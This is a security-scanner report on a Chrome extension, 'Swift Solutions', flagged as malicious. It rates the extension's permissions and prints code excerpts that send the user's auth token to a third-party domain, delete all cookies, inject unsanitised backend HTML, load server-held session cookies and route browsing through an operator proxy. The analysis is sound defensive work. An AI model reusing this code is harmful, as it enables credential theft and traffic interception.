Swift Solutions

ID: dfccmegcgoefkhnaeeodbakclihfipbo

Supported Languages

🇺🇸 English

Extension Info & Metadata

Status: Active
Version: 1.0.2
Size: 0.20 MB
Rating: 0.0/5
Reviews: 0
Users: 39
Type: Extension
Updated: Jun 23, 2026
Category: Developer tools
Price: Free
Featured: No
Visibility: Listed
Mature: No
By Google: No
Trusted: No

Publisher Contextual Analysis

Author: RTN Global
Country: US
MX records exist: Yes
Domain exists: Yes
Is disposable: No
Is role-based: Yes
Mailbox exists: Yes
Address: 1209 Mountain Rd Pl NE ste r Albuquerque, NM 87110-7845 US
Total Extensions: 6
Active: 4
Obsolete: 2
Listed: 6
Unlisted: 0
Total Users: 212

Manage browser data efficiently

| Item | Type | Severity | Description |
| --- | --- | --- | --- |
| `scripting` | Permission | Critical | This permission allows injection and execution of JavaScript on any webpage. Rated Critical because it can modify page content, steal sensitive data, and inject malicious code into any site the extension has access to. |
| `proxy` | Permission | Critical | This permission allows the extension to control the browser's proxy settings. Rated Critical because it can route all traffic through potentially malicious proxies, enabling man-in-the-middle attacks and traffic monitoring. |
| `webRequest` | Permission | Critical | This permission enables the extension to monitor and analyze all web requests made by the browser. Rated Critical because it can observe all network traffic including sensitive data, track browsing behavior, and gather authentication tokens. |
| `webRequestAuthProvider` | Permission | Critical | This permission allows the extension to handle authentication requests and modify authentication headers. Rated Critical because it can intercept login credentials, session tokens, and modify authentication flows to compromise accounts. |
| `declarativeNetRequest` | Permission | Critical | This permission allows the extension to define rules to block, redirect, or modify network requests. Rated Critical because it can control all network traffic, potentially blocking security updates or redirecting to malicious sites. |
| `<all_urls>` | Host | Critical | Broad host access — the extension can read/modify content on every website. |
| `cookies` | Permission | High | This permission provides full access to read and modify browser cookies. Rated High because it can steal session tokens, modify authentication cookies, and compromise accounts across websites. |
| Dangerous Permission Combination: `scripting`, `cookies`, `webRequest` | Risk Factor | High | Enables extensions to interact with scripts, modify files and downloads, and alter browsing history and bookmarks, potentially affecting data integrity and user control. |
| Contextual Risk Factors | Risk Factor | High | The following context increases the overall risk: • 20% increase: Access to sensitive domains increases potential impact • 10% increase: Early script execution enables pre-emptive content manipulation |
| Broad Host Permissions | Risk Factor | High | This extension has broad host permissions allowing it to access many or all websites. |
| Broad Content Script Access | Risk Factor | High | This extension can inject scripts into any website. |
| `storage` | Permission | Medium | This permission allows storing data locally in the browser. Rated Medium because it can persist sensitive user data, track user activities over time, and potentially store malicious payloads. |
| `tabs` | Permission | Medium | This permission enables tab management and monitoring. Rated Medium because it can track open tabs, access tab metadata, and monitor user browsing patterns. |
| `management` | Permission | Medium | This permission manages other installed extensions. Rated Medium because it can enable/disable other extensions and modify their settings, with changes being visible to users. |
| `*://*.dat.com/*` | Host | Medium | Host permission — access limited to this URL pattern. |
| `*://dat.com/*` | Host | Medium | Host permission — access limited to this URL pattern. |
| `*://one.dat.com/*` | Host | Medium | Host permission — access limited to this URL pattern. |
| `*://login.dat.com/*` | Host | Medium | Host permission — access limited to this URL pattern. |
| `*://script.google.com/*` | Host | Medium | Host permission — access limited to this URL pattern. |
| `*://script.googleusercontent.com/*` | Host | Medium | Host permission — access limited to this URL pattern. |
| `*://*.google.com/*` | Host | Medium | Host permission — access limited to this URL pattern. |
| Access to Sensitive Domains | Risk Factor | Medium | This extension requests access to sensitive domains: `*://script.google.com/*`, `*://script.googleusercontent.com/*`, `*://*.google.com/*` |
| Early Content Script Execution | Risk Factor | Medium | This extension runs content scripts at `document_start`. |

The user's authentication token (granting full access to their account on the operator backend) is appended as a plaintext URL query parameter when opening `https://datgo.vercel.app`. This domain is not in the extension's declared backend list (`apexskillzone.com`, `kmldigital.xyz`) and is a third-party Vercel-hosted service. URL query parameters are logged by server access logs, browser history, and referrer headers, exfiltrating live credentials to an undisclosed third party.

popup.js (Line 709)
```js
async handleOpenWebDashboard() {
  try {
    const result = await chrome.storage.local.get(['token']);
    const token = result.token;
    const userId = this.currentUser?._id || '';
    const webUrl =
      `https://datgo.vercel.app?token=${encodeURIComponent(token)}&userId=${encodeURIComponent(userId)}`;
    // For Chrome extension
    if (typeof chrome !== 'undefined' && chrome.tabs && chrome.tabs.create) {
      chrome.tabs.create({
        url: webUrl
      });
    } else {
      window.open(webUrl, '_blank');
    }
```

`clearBrowserData()` is invoked without a domain argument at line 741 (inside `openDatSessionWithData`). It calls `chrome.cookies.getAll({})` with an empty object, which returns every cookie from every domain in the browser. The loop then removes all of them. This silently logs the user out of every website they are signed into every time they click 'Open DAT', far exceeding the extension's stated scope of managing dat.com session data.

background.js (Line 786)
```js
async function clearBrowserData(domain) {
  try {
    const allCookies = await chrome.cookies.getAll({});
    for (const cookie of allCookies) {
      try {
        let normalizedDomain = cookie.domain.replace(/^\./, '');
        const urlAttempts = [];
        if (cookie.domain.startsWith('.')) {
          urlAttempts.push(`https://one${cookie.domain}${cookie.path || '/'}`);
          urlAttempts.push(`https://www${cookie.domain}${cookie.path || '/'}`);
          urlAttempts.push(`https://login${cookie.domain}${cookie.path || '/'}`);
        } else {
          urlAttempts.push(`https://${normalizedDomain}${cookie.path || '/'}`);
        }
        let removed = false;
        for (const cookieUrl of urlAttempts) {
          try {
            await chrome.cookies.remove({
              url: cookieUrl,
              name: cookie.name
            });
            removed = true;
            break;
```

The backend endpoint `/ui/open-web-button` returns an object with a `button.html` field that is injected verbatim into the extension popup via `innerHTML` without any sanitization. The extension popup runs in a privileged context with access to all Chrome extension APIs. A compromised or malicious backend can deliver HTML containing event-handler attributes or script tags that execute arbitrary code with full extension privileges, enabling cookie theft, proxy manipulation, and tab control.

popup.js (Line 674)
```js
if (response.data && response.data.success && response.data.button) {
  this.webButtonData = response.data.button;
  // Update the button HTML if it exists
  const webBtnContainer = document.getElementById('webButtonContainer');
  if (webBtnContainer) {
    webBtnContainer.innerHTML = response.data.button.html;
    webBtnContainer.style.display = 'block';
    // Add event listener to the button after it's inserted
    const openWebBtn = document.getElementById('openWebBtn');
    if (openWebBtn) {
      openWebBtn.addEventListener('click', () => this.handleOpenWebDashboard());
    }
  }
```

The extension downloads stored browser session cookies for a named session ID from the operator's backend server and then injects them into the browser (`injectCookies` at line 828). This means the operator holds dat.com session credentials server-side and distributes them to extension users on demand, which constitutes centralized credential warehousing and session cloning. The same mechanism could be abused to inject cookies for any domain the backend chooses to serve, since the injection function is domain-agnostic.

background.js (Line 654)
```js
async function loadCookiesData(sessionId) {
  try {
    const result = await chrome.storage.local.get(['token']);
    const token = result.token;
    if (!token) {
      throw new Error('No user token found');
    }
    const response = await fetchWithFailover(`/file/cookies/${sessionId}`, {
      method: 'GET',
      headers: {
        'Content-Type': 'application/json',
        'Authorization': token
      }
    });
    ...
    const cookiesData = await response.json();
    return cookiesData;
  } catch (error) {
    ...
  }
}
```

The extension fetches proxy credentials from `api.kmldigital.xyz` and sets a system-wide HTTP proxy for all browser traffic. The bypass list excludes Google and the operator's own API but routes all other traffic through an operator-controlled server. Because the proxy scheme is `http` (not HTTPS), the proxy server can observe and modify unencrypted traffic in plaintext, and because it applies to `<all_urls>` beyond dat.com, this is a man-in-the-middle position on the user's general browsing traffic whenever the extension is active.

utils/proxyService.js (Line 9)
```js
const PROXY_CONFIG_API_URL = 'https://api.kmldigital.xyz/proxy/config';
const PROXY_BYPASS_LIST = [
  'localhost',
  '127.0.0.1',
  'script.google.com',
  'script.googleusercontent.com',
  '*.google.com',
  '*.googleapis.com',
  '*.gstatic.com',
  '*.googleusercontent.com',
  'api.kmldigital.xyz'
];
...
async function applyProxy(config) {
  ...
  await chrome.proxy.settings.set({
    value: {
      mode: 'fixed_servers',
      rules: {
        singleProxy: {
          scheme: 'http',
          host: config.host,
          port: config.port
        },
        bypassList: PROXY_BYPASS_LIST
      }
    },
    scope: 'regular'
  });
```

By severity

Critical: 1
High: 4
Medium: 0
Low: 0

Versions scanned

Showing 1 of 2 scanned versions with more than one unique finding. Counts are unique findings that include each version.

| Extension Version | Code Review Findings |
| --- | --- |
| 1.0.2 | 5 |

Files with findings

3 distinct paths — top paths by unique finding count:

  • background.js: 2
  • popup.js: 2
  • utils/proxyService.js: 1

| S.No. | Category | Severity | File | Summary | Found in Version |
| --- | --- | --- | --- | --- | --- |
| 1 | Credential Theft | critical | popup.js (line 709) | The user's authentication token (granting full access to their account on the operator backend) is appended as a plaintext URL query parameter when opening `https://datgo.vercel.app`. This domain is not in the extensi… | |
| 2 | Code Injection | high | popup.js (line 674) | The backend endpoint `/ui/open-web-button` returns an object with a `button.html` field that is injected verbatim into the extension popup via `innerHTML` without any sanitization. The extension popup runs in a privil… | |
| 3 | Credential Theft | high | background.js (line 654) | The extension downloads stored browser session cookies for a named session ID from the operator's backend server and then injects them into the browser (`injectCookies` at line 828). This means the operator holds dat.… | |
| 4 | Network Interception | high | utils/proxyService.js (line 9) | The extension fetches proxy credentials from `api.kmldigital.xyz` and sets a system-wide HTTP proxy for all browser traffic. The bypass list excludes Google and the operator's own API but routes all other traffic thro… | |
| 5 | Other | high | background.js (line 786) | `clearBrowserData()` is invoked without a domain argument at line 741 (inside `openDatSessionWithData`). It calls `chrome.cookies.getAll({})` with an empty object, which returns every cookie from every domain in the b… | |

URLs: 15
IPv4: 1
IPv6: 0

URLs

View the external URLs this extension communicates with to understand its network activity and data interactions.

IPv4: 127.0.0.1

| Version | Size | Is Malicious | Findings | Permhash |
| --- | --- | --- | --- | --- |
| 1.0.2 (Latest) | 0.20 MB | Malicious | 5 | |
| 1.0.1 | 0.20 MB | Benign | — | |

Code Diff

Compare extension code between any two versions.

0 changed files (scanned top 25 shared text files)

No comparable text files found between these versions.
